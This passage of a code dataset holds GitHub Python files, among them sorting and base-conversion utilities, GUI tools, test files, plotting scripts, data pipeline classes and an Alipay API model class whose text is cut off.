+{"seq_id":"29544299045","text":"def find_smallest(arr):\n smallest = arr[0]\n smallest_index = 0\n for i, item in enumerate(arr):\n if item < smallest:\n smallest = item\n smallest_index = i\n return smallest_index\n\n\ndef selection_sort(arr): # with generator comprehension\n return [arr.pop(find_smallest(arr)) for i in range(len(arr))]\n","repo_name":"mikhailfed68/algorithms","sub_path":"algorithms/selection_sort.py","file_name":"selection_sort.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"}
+{"seq_id":"73262418181","text":"\"\"\"\nwat\n\"\"\"\n\n\ndef trier(f):\n def fn(n):\n try:\n return f(n)\n except:\n return 0\n return fn\n\ndechex=lambda n:int(\"0x%s\"%n,16)\ntest=lambda n: ((n**2) == trier(int)(hex(dechex(n)**2)[2:].replace('L','')), hex(dechex(n)),hex(dechex(n**2)))\nprint(\"\\n\".join([ \" %s * %s = %s\\n%s * %s = %s\" % (n,n,n**2,hex(dechex(n)),hex(dechex(n)),hex(dechex(n)**2)) for n in range(100001) if test(n)[0]]))\n\n\noctt=lambda n: oct(n) if n is not 0 else '00'\n\ndecbin=lambda n:int(\"0b%s\"%n,2)\ndecoct=lambda n:int(\"0%s\"%n,8)\ntestb=lambda n: ((n**2) == trier(int)(bin(trier(decbin)(n)**2)[2:]), bin(trier(decbin)(n)),bin(trier(decbin)(n**2)))\ntesto=lambda n: ((n**2) == int(octt(trier(decoct)(n)**2)[1:]), octt(trier(decoct)(n)),octt(trier(decoct)(n**2)))\n\n#hexmatches=[ n for n in range(100000) if test(n)[0]]\n#binmatches=[ n for n in range(100000) if testb(n)[0]]\n#octmatches=[ n for n in range(100000) if testo(n)[0]]\n\n\ndef base(b, n):\n digit = 0\n result = []\n assert b>0\n while b**(digit+1) <= n:\n digit+=1\n while digit>=0:\n value = n / (b**digit)\n if value > 9:\n value = chr(ord('a') + (value - 10))\n result.append(value)\n n%=b**digit\n digit-=1\n return ''.join(map(str,result))\n\ndef test_base(b, r=100001):\n results = []\n for i in range(r):\n try: \n w = int( str(i), b )\n if i**2 == int( base(b, w**2) ):\n results.append(i)\n except:\n continue\n return results\n","repo_name":"leif/lol","sub_path":"symmetry.py","file_name":"symmetry.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"8"}
+{"seq_id":"14217077474","text":"import time,sys\r\nprint(\"Programa Hoşgeldiniz...\")\r\nwhile True:\r\n x=int(input(\"Girmek İstediğiniz Sayıyı Giriniz: \"))\r\n a=x%5\r\n print(a)\r\n sec=input(\"Devam Etmek İstiyor Musunuz(E/H)? :\")\r\n if sec==\"H\" or sec==\"h\":\r\n print(\"Programdan Çıkış Yapıyorsunuz...\")\r\n time.sleep(3)\r\n sys.exit()\r\n elif sec==\"E\" or sec==\"e\":\r\n print(\"Devam Ediyorsunuz...\")\r\n time.sleep(1)","repo_name":"ataberkkoroglu/Python-Code-Exercise","sub_path":"Çalışma 8.py","file_name":"Çalışma 8.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"7240191336","text":"import typing\n\nfrom aiogram.types import InlineKeyboardMarkup, InlineKeyboardButton\n\nfrom . import callbacks\n\n\ndef buy_menu_keyboard(user_id: int, privilege: typing.List[dict]) -> InlineKeyboardMarkup:\n\n markup = InlineKeyboardMarkup()\n markup.add(\n InlineKeyboardButton(\n text='Пополнить баланс',\n callback_data=callbacks.replenishment.new(user_id)\n )\n )\n markup.inline_keyboard.append([])\n\n for key, value in privilege.items():\n markup.insert(\n InlineKeyboardButton(\n text=value['name'],\n callback_data=callbacks.privilege.new(key, user_id)\n )\n )\n\n return markup\n","repo_name":"MrArlian/order_04_07_23","sub_path":"keyboards/generated.py","file_name":"generated.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"18402924685","text":"# Ensure that the local version of the runway module is used, not a pip\n# installed version\nimport sys\nsys.path.insert(0, '..')\nsys.path.insert(0, '.')\n\nimport pytest\nfrom runway.exceptions import *\nfrom runway import exceptions\nimport runway\n\ndef get_exceptions():\n error_names = [name for name in dir(exceptions) if name.endswith('Error')]\n return {name: getattr(exceptions, name) for name in error_names}\n\ndef check_to_response_method(err):\n response = err.to_response()\n assert type(response) == dict\n assert 'error' in response\n assert 'traceback' in response\n assert len(response['error']) > 0\n assert len(response['traceback']) > 0\n\ndef check_code_and_error(error_class,\n expected_code,\n expected_message,\n inpt=None):\n try:\n if inpt is not None:\n raise error_class(inpt)\n else:\n raise error_class()\n except RunwayError as err:\n assert err.code == expected_code\n assert err.message == expected_message\n\n# Going for the longest function name award here. The whole signature is 80 char\ndef test_all_runway_errors_have_code_and_message_props_and_to_response_method():\n for name, error in get_exceptions().items():\n try:\n if name == 'RunwayError':\n raise error()\n else:\n raise error('test error message.')\n except error as err:\n assert type(err.message) == str\n assert type(err.code) == int\n assert err.code >= 400\n check_to_response_method(err)\n\ndef test_runway_error():\n check_code_and_error(RunwayError, 500, 'An unknown error occurred.')\n\ndef test_missing_option_error():\n expect = 'Missing option: test_option.'\n check_code_and_error(MissingOptionError, 400, expect, inpt='test_option')\n\ndef test_missing_input_error():\n expect = 'Missing input: test_option.'\n check_code_and_error(MissingInputError, 400, expect, inpt='test_option')\n\ndef test_invalid_argument_error():\n expect = 'Invalid argument: test_option.'\n check_code_and_error(InvalidArgumentError, 400, expect, inpt='test_option')\n\ndef test_inference_error():\n expect = 'Error during inference: test_option.'\n check_code_and_error(InferenceError, 500, expect, inpt='test_option')\n\ndef test_unknown_command_error():\n expect = 'Unknown command: test_option.'\n check_code_and_error(UnknownCommandError, 404, expect, inpt='test_option')\n\ndef test_setup_error():\n expect = 'Error during setup: test_option.'\n check_code_and_error(SetupError, 500, expect, inpt='test_option')\n\ndef test_missing_argument_error():\n expect = 'Missing argument: test_option.'\n check_code_and_error(MissingArgumentError, 500, expect, inpt='test_option')\n\ndef test_print_exception(capsys):\n def foo(): raise RunwayError()\n def bar(): foo()\n try:\n bar()\n except RunwayError as err:\n err.print_exception()\n captured = capsys.readouterr()\n assert err.message in captured.err\n assert 'in foo' in captured.err\n assert 'in bar' in captured.err\n assert 'raise RunwayError' in captured.err\n","repo_name":"runwayml/model-sdk","sub_path":"tests/test_exceptions.py","file_name":"test_exceptions.py","file_ext":"py","file_size_in_byte":3191,"program_lang":"python","lang":"en","doc_type":"code","stars":102,"dataset":"github-code","pt":"91"}
+{"seq_id":"19477827167","text":"# This Python file uses the following encoding: utf-8\nimport PySimpleGUI as sg # on importe les modules depuis PysimpleGui\n\n\ndef ConversionMachine(nb,mode): # On définit toutes les convertions qu'on veut faire\n try: \n if mode == \"BIN2DEC\" : # ici pour passer de binaire à decimal \n decimal= int(nb,2) # on doit d'abord convertir le \"str\" en \"int\"\n return (str(decimal)) # après cela on retourne le résultat en \"str\"\n\n elif mode == \"DEC2BIN\": # ici pour passer de decimal à binaire\n decimal= int(nb) # on le convertit d'abord en \"int\"\n binaire = (bin(decimal)) # ensuite on le tranforme en binaire en utilisant la fonction \"bin() préexistante\"\n return (str(binaire)) # après cela on retourne le résultat en \"str\"\n\n elif mode == \"BIN2HEX\": # ici pour passer de binaire à hexadécimale\n binaire = int(nb,2) # on le convertit en \"int\"\n hexa = (hex(binaire)) # on convertit ce résultat en hexadécimal avec la fonction \"hex()\" préexistante\n return (str(hexa)) # après cela on retourne le résultat en \"str\"\n \n elif mode == \"HEX2BIN\":# ici pour passer de héxadécimale à binaire\n hexa = int(nb,16) # on le convertit en \"int\"\n binaire = (bin(hexa)) # ensuite on le tranforme en binaire en utilisant la fonction \"bin() préexistante\"\n return (str(binaire))# après cela on retourne le résultat en \"str\"\n\n elif mode == \"DEC2HEX\":# ici pour passer de decimal à hexadécimale\n decimal = int(nb,10) # on le convertit en \"int\"\n hexa = hex(decimal) #on convertit ce résultat en hexadécimal avec la fonction \"hex()\" préexistante\n return (str(hexa))# après cela on retourne le résultat en \"str\"\n \n elif mode == \"HEX2DEC\":# ici pour passer de decimal à binaire\n hexa = int(nb,16) # on le convertit en \"int\"\n decimal= (int(hexa)) \n return (str(hexa))# après cela on retourne le résultat en \"str\"\n except ValueError: # si il y'a une erreur causé par une valeur entré pas adéquate à la convertion choisie\n erreur = \"Vous n'avez pas entrer la bonne valeur pour le mode choisi\"\n return erreur\n\ndef addition(nb1,nb2): # fonction pour addtioner des valeurs binaires\n calcul = int(nb1,2) + int(nb2,2) # on transforme les deux valeurs binaire et int puis on les addtionne\n res = (bin(calcul)) # ensuite on le convertit au format binaire\n return((str(res))) # après cela on retourne le résultat en \"str\"\n\ndef multiplication(nb1,nb2): # fonction pour multiplier des valeurs binaires\n calcul = (int(nb1,2)) * (int(nb2,2))\n res = (bin(calcul))\n return((str(res)))\n\ndef soustraction(nb1,nb2): # fonction pour soustraire des valeurs binaires\n calcul = (int(nb1,2)) - (int(nb2,2))\n res = (bin(calcul))\n return((str(res)))\n\ndef interface3(): \n while True:\n event, values = window3.read() \n print(event, values)\n \n if event in (None, 'Exit'):\n break\n \n if event == \"ENTREZ\": # lorsqu'in click sur \"ENTREZ\", la fenêtre se cache et la première interface s'ouvre\n window3.Hide()\n interface1()\n\n\ndef interface2():\n if interface2.open == True:\n window2.UnHide()\n interface2.open = True\n while True:\n event, values = window2.read()\n print(event, values)\n \n if event in (None, 'Exit'):\n window.close() # lorqu'on click sur \"Exit\", les deux interfaces se ferment\n window2.close()\n break\n\n \n if event == 'ADDITION':\n res = addition(values['nb1'],values['nb2'])# on transforme les valeurs entrées avec la fonction défini avant\n res_dec = int(res,2)\n hexa = int(res,2)\n res_hex = (hex(hexa))\n window2['-OUTPUT-'].update(res) # on fait apparaître la clé \n window2['OUTPUT2'].update(res_dec) # on fait apparaître la clé \n window2['OUTPUT3'].update(res_hex)# on fait apparaître la clé \n\n \n if event == 'MULTIPLICATION':\n res = multiplication(values['nb1'],values['nb2']) # on transforme les valeurs entrées avec la fonction défini avant\n res_dec = int(res,2)\n hexa = int(res,2)\n res_hex = (hex(hexa))\n window2['-OUTPUT-'].update(res)# on fait apparaître la clé \n window2['OUTPUT2'].update(res_dec)# on fait apparaître la clé \n window2['OUTPUT3'].update(res_hex)# on fait apparaître la clé \n\n if event == 'SOUSTRACTION':\n res = soustraction(values['nb1'],values['nb2']) # on transforme les valeurs entrées avec la fonction défini avant\n res_dec = int(res,2)\n hexa = int(res,2)\n res_hex = (hex(hexa))\n window2['-OUTPUT-'].update(res)# on fait apparaître la clé \n window2['OUTPUT2'].update(res_dec)# on fait apparaître la clé \n window2['OUTPUT3'].update(res_hex)# on fait apparaître la clé \n \n\n if event == \"RETURN\": # lorqu'on click sur return on cache l'interface 2 et on ouvre l'interface 1\n window2.Hide() \n window.UnHide()\n interface1()\n\ndef interface1():\n while True:\n event, values = window.read()\n print(event, values)\n \n if event in (None, 'Exit'):\n window.close()\n window2.close()\n break\n \n \n if event == 'BIN2DEC':\n res = ConversionMachine(values['-IN-'],event)# on transforme la valeur entrer avec la fonction défini avant\n window['-OUTPUT-'].update(res) # on fait apparaître la clé avec notre résultat\n \n if event == 'DEC2BIN':\n res = ConversionMachine(values['-IN-'],event)# on transforme la valeur entrer avec la fonction défini avant\n window['-OUTPUT-'].update(res) # on fait apparaître la clé avec notre résultat\n\n if event == 'BIN2HEX':\n res = ConversionMachine(values['-IN-'],event)# on transforme la valeur entrer avec la fonction défini avant\n window['-OUTPUT-'].update(res) # on fait apparaître la clé avec notre résultat\n\n if event == 'HEX2BIN':\n res = ConversionMachine(values['-IN-'],event) # on transforme la valeur entrer avec la fonction défini avant\n window['-OUTPUT-'].update(res)# on fait apparaître la clé avec notre résultat\n \n if event == 'DEC2HEX':\n res = ConversionMachine(values['-IN-'],event) # on transforme la valeur entrer avec la fonction défini avant\n window['-OUTPUT-'].update(res)# on fait apparaître la clé avec notre résultat\n\n if event == 'HEX2DEC':\n res = ConversionMachine(values['-IN-'],event) # on transforme la valeur entrer avec la fonction défini avant\n window['-OUTPUT-'].update(res) # on fait apparaître la clé avec notre résultat\n \n if event == 'DEC2HEX':\n res = ConversionMachine(values['-IN-'],event) # on transforme la valeur entrer avec la fonction défini avant\n window['-OUTPUT-'].update(res) # on fait apparaître la clé avec notre résultat\n\n\n\n if event == \"CALCULS\": # si on click sur “calcul“ on cache l'interface 1 et on ouvre l'interface 2\n window.Hide()\n interface2()\n\n\n# Programme principal\n\nimport PySimpleGUI as sg\n \nsg.theme('DarkPurple1') # le thème de couleur choisi\n \nlayout3= [[sg.Text('BIENVENUE SUR NSI WORLD', justification='center',size=(100,1), font=(\"Chalkboard\"))],[sg.Text('Ces interfaces ont été crée dans le but de faciliter vos calcul en utilisant le sytème binaire ou héxadécimal.',justification='center',size=(100,1), font=(\"Chalkboard\"))], [sg.Text(\" Nous espérons que cela vous sera utile!\",justification='center',size=(100,1), font=(\"Chalkboard\"))],[ sg.Text(\" Bonne Navigation!\", justification='center',size=(100,1), font=(\"Chalkboard\"))], [sg.Button('ENTREZ', pad=(380, 0), font=(\"Chalkboard\"))]]\n# ici on a défini tous les boutons pour notre page d'accueil\n \nwindow3 = sg.Window('ACCUEIL', layout3) # le nom en haut marge de l'interface\n\nsg.theme('DarkPurple1')# le thème de couleur choisi\n\nlayout = [[sg.Button('BIN2DEC',font=(\"Chalkboard\")), sg.Button('DEC2BIN',font=(\"Chalkboard\")),\n sg.Button('DEC2HEX',font=(\"Chalkboard\"))],\n [sg. Button('BIN2HEX',font=(\"Chalkboard\")), sg.Button('HEX2BIN',font=(\"Chalkboard\")),sg.Button('HEX2DEC',font=(\"Chalkboard\"))],\n [sg.Text('Valeur à convertir',font=(\"Chalkboard\"))],\n [sg.Input(key='-IN-')],\n [sg.Text('Résultat',font=(\"Chalkboard\")),\n\t\tsg.Text(size=(50,2), key='-OUTPUT-')],\n [ sg.Button('Exit',font=(\"Chalkboard\")), sg.Button('CALCULS',font=(\"Chalkboard\"))]]\n# ici on a défini tous les boutons et les clé qu'on va récuperer pour effectuer les convertions\nwindow = sg.Window('Machine à Convertir', layout) # le nom en haut marge de l'interface\n\nsg.theme('DarkPurple1') # le thème de couleur choisi\n \nlayout2 = [[sg.Button('ADDITION',font=(\"Chalkboard\")),sg.Button('MULTIPLICATION',font=(\"Chalkboard\")),sg.Button('SOUSTRACTION', font=(\"Chalkboard\"))],\n [sg.Text('Entrez votre premier valeur en binaire:',font=(\"Chalkboard\"))],\n [sg.Input(key='nb1')],\n [sg.Text('Entrez votre seconde valeur en binaire:',font=(\"Chalkboard\"))],\n [sg.Input(key='nb2')],\n [sg.Text('Résultats:',font=(\"Chalkboard\")),\n sg.Text(size=(15,1), key='-OUTPUT-')],[sg.Text('Décimal:',font=(\"Chalkboard\")),\n sg.Text(size=(15,1), key='OUTPUT2')],[sg.Text('Héxadécimal:',font=(\"Chalkboard\")),\n sg.Text(size=(15,1), key='OUTPUT3')],\n [sg.Button('Exit',font=(\"Chalkboard\")),sg.Button('RETURN',font=(\"Chalkboard\"))]]\n# ici on a défini tous les boutons et les clé qu'on va récuperer pour effectuer les calculs\nwindow2 = sg.Window('Calculatrice Binaire', layout2) # le nom en haut marge de l'interface\n\n\n\ninterface2.open = False\ninterface3()\n\nwindow.close() # on ferme les fenetres\nwindow2.close()\n","repo_name":"Jana-Ait-Said/Binary-Calculator","sub_path":"Jana_Snt_Machine_A_Convertir.py","file_name":"Jana_Snt_Machine_A_Convertir.py","file_ext":"py","file_size_in_byte":10214,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"2254671602","text":"import numpy as np\nimport pandas as pd\nimport scipy.special\n\nfrom bokeh.layouts import gridplot\nfrom bokeh.models import BoxSelectTool, LassoSelectTool\nfrom bokeh.plotting import curdoc, figure, output_file, show\n\ndef make_plot(title, hist, edges, x, pdf, cdf):\n p = figure(title=title, tools='', background_fill_color=\"#fafafa\")\n p.quad(top=hist, bottom=0, left=edges[:-1], right=edges[1:],\n fill_color=\"navy\", line_color=\"white\", alpha=0.5)\n p.line(x, pdf, line_color=\"#ff8888\", line_width=4, alpha=0.7, legend_label=\"PDF\")\n p.line(x, cdf, line_color=\"orange\", line_width=2, alpha=0.7, legend_label=\"CDF\")\n\n p.y_range.start = 0\n p.legend.location = \"center_right\"\n p.legend.background_fill_color = \"#fefefe\"\n p.xaxis.axis_label = 'x'\n p.yaxis.axis_label = 'Pr(x)'\n p.grid.grid_line_color=\"white\"\n return p\ndef update(attr, old, new):\n inds = new\n if len(inds) == 0 or len(inds) == len(x):\n hhist1 = hzeros\n else:\n neg_inds = np.ones_like(x, dtype=np.bool)\n neg_inds[inds] = False\n hhist1, _ = np.histogram(x[inds], bins=hedges)\n\n hh1.data_source.data[\"top\"] = hhist1\n\ndataFile = './data/toc.csv'\ndata = pd.read_csv(dataFile)\n\nduration = pd.DatetimeIndex(data['Length (hh:mm:ss)'])\n\ny = duration.hour * 3600 + duration.minute * 60 + duration.second\n#y = y.sort_values()\nprint('\\n========================================================================')\nprint(data['Title'][0]+' by '+data['Author'][0]+', published in '+str(int(data['Published'][0])))\nprint('The mean chapter length is '+str(int(np.mean(y)/60))+' minutes')\nprint('Chapters range from '+str(int(np.min(y)/60))+' to '+str(int(np.max(y)/60))+' minutes')\nprint('========================================================================\\n')\n\n#wantCh = input('Would you like to see the chapter titles (yes/no)? :')\n#loadedData = None\n#if wantCh[0]=='y' and loadedData==False:\n# print(data['Chapter'])\n# loadedData = True\n#else :\n\n#x = [n for n in range(len(y))]\n\n# Normal Distribution\n\nmu, sigma = 0, 0.5\n\nmeasured = np.random.normal(mu, sigma, 1000)\nhist, edges = np.histogram(measured, density=True, bins=50)\n\nx = np.linspace(-2, 2, 1000)\npdf = 1/(sigma * np.sqrt(2*np.pi)) * np.exp(-(x-mu)**2 / (2*sigma**2))\ncdf = (1+scipy.special.erf((x-mu)/np.sqrt(2*sigma**2)))/2\n\np1 = make_plot(\"Normal Distribution (μ=0, σ=0.5)\", hist, edges, x, pdf, cdf)\n#output_file(data['Author']+'.html', title=data['Title'])\n\nshow(gridplot([p1], ncols=1, plot_width=600, plot_height=600, toolbar_location=None))\n#print(x,measured)\n","repo_name":"szunez/py-apps","sub_path":"bukowski/ch-histo.py","file_name":"ch-histo.py","file_ext":"py","file_size_in_byte":2567,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"91"}
+{"seq_id":"16276866880","text":"# Written by Alexander Wurts\n# Data Science 3001 Final Project\n\nfrom tkinter import *\nfrom model.map import Map\nfrom model.datahandler import DataHandler\nfrom view.selectorcanvas import SelectionCanvas\n\n\n\nclass GUI:\n\n WIDTH = 1500\n HEIGHT = 1024\n\n SIDES = [(\"Terrorist\", 'Terrorist'),\n (\"Counter Terrorist\", \"CounterTerrorist\"),\n ('Both', \"Both\")]\n\n\n\n def __init__(self):\n self.root = Tk()\n self.root.geometry(str(GUI.WIDTH) + 'x' + str(GUI.HEIGHT))\n\n\n self.data = DataHandler()\n self.mainFrame = Frame(self.root)\n self.mainFrame.pack(side=LEFT, fill=BOTH, expand=True)\n\n\n self.currentFilter = DataHandler.EMPTY_FILTER\n\n self.mainscene()\n self.root.mainloop()\n\n\n def mainscene(self):\n\n def reload():\n # Box on Map Handler\n box = self.canvas.getBox()\n self.currentFilter = DataHandler.EMPTY_FILTER\n if box is not None:\n self.currentFilter['box'] = box\n else:\n self.currentFilter['box'] = None\n\n if boxAroundVar.get() == 'Attacker':\n self.currentFilter['box_around'] = 'Attacker'\n else:\n self.currentFilter['box_around'] = 'Victim'\n\n\n # Map Selector\n self.canvas.setMap(Map(currentMap.get()))\n self.currentFilter['map'] = \"'\" + currentMap.get() + \"'\"\n\n # Attack Side Selector\n if attSideVar.get() == \"Both\":\n self.currentFilter['att_side'] = None\n else:\n self.currentFilter['att_side'] = \"'\" + attSideVar.get() + \"'\"\n\n # Victim Side Selector\n if vicSideVar.get() == \"Both\":\n self.currentFilter['vic_side'] = None\n else:\n self.currentFilter['vic_side'] = \"'\" + vicSideVar.get() + \"'\"\n\n # User ID Entry\n if idEntry.get() != 'None':\n self.currentFilter['att_id'] = int(idEntry.get())\n else:\n self.currentFilter['att_id'] = None\n\n # Weapon Selection\n if weaponVar.get() != 'All':\n self.currentFilter['wp'] = \"'\" + weaponVar.get() + \"'\"\n else:\n self.currentFilter['wp'] = None\n\n for key, data in enumerate(vicAndAttRankRange):\n if data.get() != '':\n self.currentFilter['player_rank_range'][key] = int(data.get())\n else:\n # if key is an odd number set value to 18, else even set 0\n self.currentFilter['player_rank_range'][key] = 18 * (key % 2)\n\n\n self.canvas.addData(self.data.applyFilter(self.currentFilter))\n self.canvas.reloadImage()\n\n\n self.topFrame = Frame(self.mainFrame)\n self.topFrame.grid(column=1, row=0)\n\n ## Side Bar Configuration\n Button(self.topFrame, text='Reload', command=reload).grid(column=1, row=0)\n\n\n # Map Dropdown\n currentMap = StringVar(self.topFrame)\n currentMap.set(Map.MAPS[2])\n mapSelector = OptionMenu(self.topFrame, currentMap, *Map.MAPS)\n mapSelector.grid(column=1, row=1)\n Label(self.topFrame, text=\"Map: \").grid(row=1, column=0)\n\n # Att Side\n Label(self.topFrame, text=\"Attacker Side: \").grid(row=2, column=0)\n attSideFrame = Frame(self.topFrame)\n attSideFrame.grid(row=2, column=1)\n attSideVar = StringVar()\n attSideVar.set(\"Both\")\n for side in GUI.SIDES:\n b = Radiobutton(attSideFrame, text=side[0], variable=attSideVar, value=side[1])\n b.pack(anchor=W)\n\n # Vic Side\n Label(self.topFrame, text=\"Victim Side: \").grid(row=3, column=0)\n vicSideFrame = Frame(self.topFrame)\n vicSideFrame.grid(row=3, column=1)\n vicSideVar = StringVar()\n vicSideVar.set(\"Both\")\n for side in GUI.SIDES:\n b = Radiobutton(vicSideFrame, text=side[0], variable=vicSideVar, value=side[1])\n b.pack(anchor=W)\n\n # Att ID\n Label(self.topFrame, text=\"Attacker ID (Type None for all players): \").grid(row=4, column=0)\n idEntryVar = StringVar()\n idEntryVar.set(\"None\")\n idEntry = Entry(self.topFrame, textvariable=idEntryVar)\n idEntry.grid(row=4, column=1)\n\n # Victim and Attacker Rank Ranges\n labels = ['Min Attacker Rank: ', 'Max Attacker Rank: ', \"Min Victim Rank: \", \"Max Victim Rank\"]\n vicAndAttRankRange = []\n Label(self.topFrame, text=\"Attacker and Victim Rank (1-18, lower is better): \").grid(row=5, columnspan=2)\n for key, label in enumerate(labels):\n Label(self.topFrame, text=label).grid(row=6 + key, column=0)\n vicAndAttRankRange.append(Entry(self.topFrame))\n vicAndAttRankRange[-1].grid(row=6 + key, column=1)\n\n\n # Weapon\n weapons = ['All', 'USP', 'Glock', 'P2000', 'HE', 'Tec9', 'Deagle', 'MP9', 'UMP',\n 'Famas', 'P250', 'AK47', 'AWP', 'MP7', 'M4A1', 'FiveSeven',\n 'Incendiary', 'Scout', 'Unknown', 'Knife', 'Bizon', 'Flash', 'CZ',\n 'M4A4', 'Molotov', 'P90', 'AUG', 'Gallil', 'G3SG1', 'M249', 'SG556',\n 'Mac10', 'XM1014', 'DualBarettas', 'Nova', 'Swag7', 'Zeus',\n 'Scar20', 'SawedOff', 'Smoke', 'Negev', 'Decoy', 'Bomb']\n weaponVar = StringVar(self.topFrame)\n weaponVar.set(\"AK47\")\n weaponSelector = OptionMenu(self.topFrame, weaponVar, *weapons)\n weaponSelector.grid(row=10, column=1)\n Label(self.topFrame, text=\"Weapon: \").grid(row=10, column=0)\n\n\n # Box around attacker or victim\n Label(self.topFrame, text=\"Box Around: \").grid(row=11, column=0)\n boxAroundFrame = Frame(self.topFrame)\n boxAroundFrame.grid(row=11, column=1)\n boxAroundVar = StringVar()\n boxAroundVar.set(\"Both\")\n for side in ['Victim', 'Attacker']:\n b = Radiobutton(boxAroundFrame, text=side, variable=boxAroundVar, value=side)\n b.pack(anchor=W)\n\n self.canvas = SelectionCanvas(self.mainFrame, width=1024, height=1024)\n self.canvas.grid(column=0, row=0, stick=W)\n self.canvas.focus_force()\n\n self.canvas.addData(self.data.applyFilter(DataHandler.EMPTY_FILTER))\n self.canvas.reloadImage()\n\n\n\n\n\nGUI()\n","repo_name":"AJWurts/DS3001_Final_Project","sub_path":"UI.py","file_name":"UI.py","file_ext":"py","file_size_in_byte":6346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"665489708","text":"import os\nfrom os.path import exists\n\nimport cpr\nimport koopa.io\nimport pandas as pd\nimport xxhash\nfrom cpr.Resource import Resource\nfrom cpr.Serializer import cpr_serializer\nfrom cpr.Target import Target\nfrom prefect.serializers import JSONSerializer\nfrom prefect.utilities.importtools import from_qualified_name\n\n\nclass ParquetSource(Resource):\n def __init__(self, location: str, name: str, ext: str):\n super(ParquetSource, self).__init__(location=location, name=name, ext=ext)\n\n def get_data(self) -> pd.DataFrame:\n if self._data is None:\n assert os.path.exists(self.get_path()), f\"{self.get_path()} does not exist.\"\n self._data = koopa.io.load_parquet(self.get_path())\n\n return self._data\n\n\nclass ParquetTarget(Target):\n def __init__(\n self,\n location: str,\n name: str,\n ext: str = \".parq\",\n data_hash: str = None,\n ):\n super(ParquetTarget, self).__init__(\n location=location, name=name, ext=ext, data_hash=data_hash\n )\n\n def get_data(self) -> pd.DataFrame:\n if self._data is None:\n assert os.path.exists(self.get_path()), (\n f\"{self.get_path()} does not \" f\"exist.\"\n )\n self._data = koopa.io.load_parquet(self.get_path())\n\n return self._data\n\n def _hash_data(self, data) -> str:\n data_hash = pd.core.util.hashing.hash_pandas_object(data).values.tobytes()\n return xxhash.xxh3_64(data_hash).hexdigest()\n\n def _write_data(self):\n if self._data is not None and not exists(self.get_path()):\n koopa.io.save_parquet(self.get_path(), self._data)\n\ndef target_decoder(result: dict):\n \"\"\"\n Decoder which takes care of cpr objects.\n\n Otherwise prefect_json_object_decoder is used.\n \"\"\"\n if \"__class__\" in result:\n if result[\"__class__\"].startswith(\"koopaflows.cpr_parquet.\"):\n clazz = from_qualified_name(result[\"__class__\"])\n return clazz(**result[\"data\"])\n else:\n return cpr.Serializer.target_decoder(result)\n\n return result\n\ndef koopa_serializer(dumps_kwargs={}) -> JSONSerializer:\n \"\"\"JSONSerializer configured to work with cpr objects.\"\"\"\n return JSONSerializer(\n object_encoder=\"cpr.Serializer.target_encoder\",\n object_decoder=\"koopaflows.cpr_parquet.target_decoder\",\n dumps_kwargs=dumps_kwargs,\n )","repo_name":"fmi-basel/gchao-koopa-flows","sub_path":"src/koopaflows/cpr_parquet.py","file_name":"cpr_parquet.py","file_ext":"py","file_size_in_byte":2422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"70839506223","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport json\n\nfrom alipay.aop.api.constant.ParamConstants import *\n\n\nclass AlipayCommerceIotMsgcenterSendModel(object):\n\n def __init__(self):\n self._content = None\n self._datetime = None\n self._ext_info = None\n self._is_support_link = None\n self._link = None\n self._title = None\n self._type = None\n self._user_id = None\n\n @property\n def content(self):\n return self._content\n\n @content.setter\n def content(self, value):\n self._content = value\n @property\n def datetime(self):\n return self._datetime\n\n @datetime.setter\n def datetime(self, value):\n self._datetime = value\n @property\n def ext_info(self):\n return self._ext_info\n\n @ext_info.setter\n def ext_info(self, value):\n self._ext_info = value\n @property\n def is_support_link(self):\n return self._is_support_link\n\n @is_support_link.setter\n def is_support_link(self, value):\n self._is_support_link = value\n @property\n def link(self):\n return self._link\n\n @link.setter\n def link(self, value):\n self._link = value\n @property\n def title(self):\n return self._title\n\n @title.setter\n def title(self, value):\n self._title = value\n @property\n def type(self):\n return self._type\n\n @type.setter\n def type(self, value):\n self._type = value\n @property\n def user_id(self):\n return self._user_id\n\n @user_id.setter\n def user_id(self, value):\n self._user_id = value\n\n\n def to_alipay_dict(self):\n params = dict()\n if self.content:\n if hasattr(self.content, 'to_alipay_dict'):\n params['content'] = self.content.to_alipay_dict()\n else:\n params['content'] = self.content\n if self.datetime:\n if hasattr(self.datetime, 'to_alipay_dict'):\n params['datetime'] = self.datetime.to_alipay_dict()\n else:\n params['datetime'] = self.datetime\n if self.ext_info:\n if hasattr(self.ext_info, 'to_alipay_dict'):\n params['ext_info'] = self.ext_info.to_alipay_dict()\n else:\n params['ext_info'] = self.ext_info\n if self.is_support_link:\n if hasattr(self.is_support_link, 'to_alipay_dict'):\n params['is_support_link'] = self.is_support_link.to_alipay_dict()\n else:\n params['is_support_link'] = self.is_support_link\n if self.link:\n if hasattr(self.link, 'to_alipay_dict'):\n params['link'] = self.link.to_alipay_dict()\n else:\n params['link'] = self.link\n if self.title:\n if hasattr(self.title, 'to_alipay_dict'):\n params['title'] = self.title.to_alipay_dict()\n else:\n params['title'] = self.title\n if self.type:\n if hasattr(self.type, 'to_alipay_dict'):\n params['type'] = self.type.to_alipay_dict()\n else:\n params['type'] = self.type\n if self.user_id:\n if hasattr(self.user_id, 'to_alipay_dict'):\n params['user_id'] = self.user_id.to_alipay_dict()\n else:\n params['user_id'] = self.user_id\n return params\n\n @staticmethod\n def from_alipay_dict(d):\n if not d:\n return None\n o = AlipayCommerceIotMsgcenterSendModel()\n if 'content' in d:\n o.content = d['content']\n if 'datetime' in d:\n o.datetime = d['datetime']\n if 'ext_info' in d:\n o.ext_info = d['ext_info']\n if 'is_support_link' in d:\n o.is_support_link = d['is_support_link']\n if 'link' in d:\n o.link = d['link']\n if 'title' in d:\n o.title = 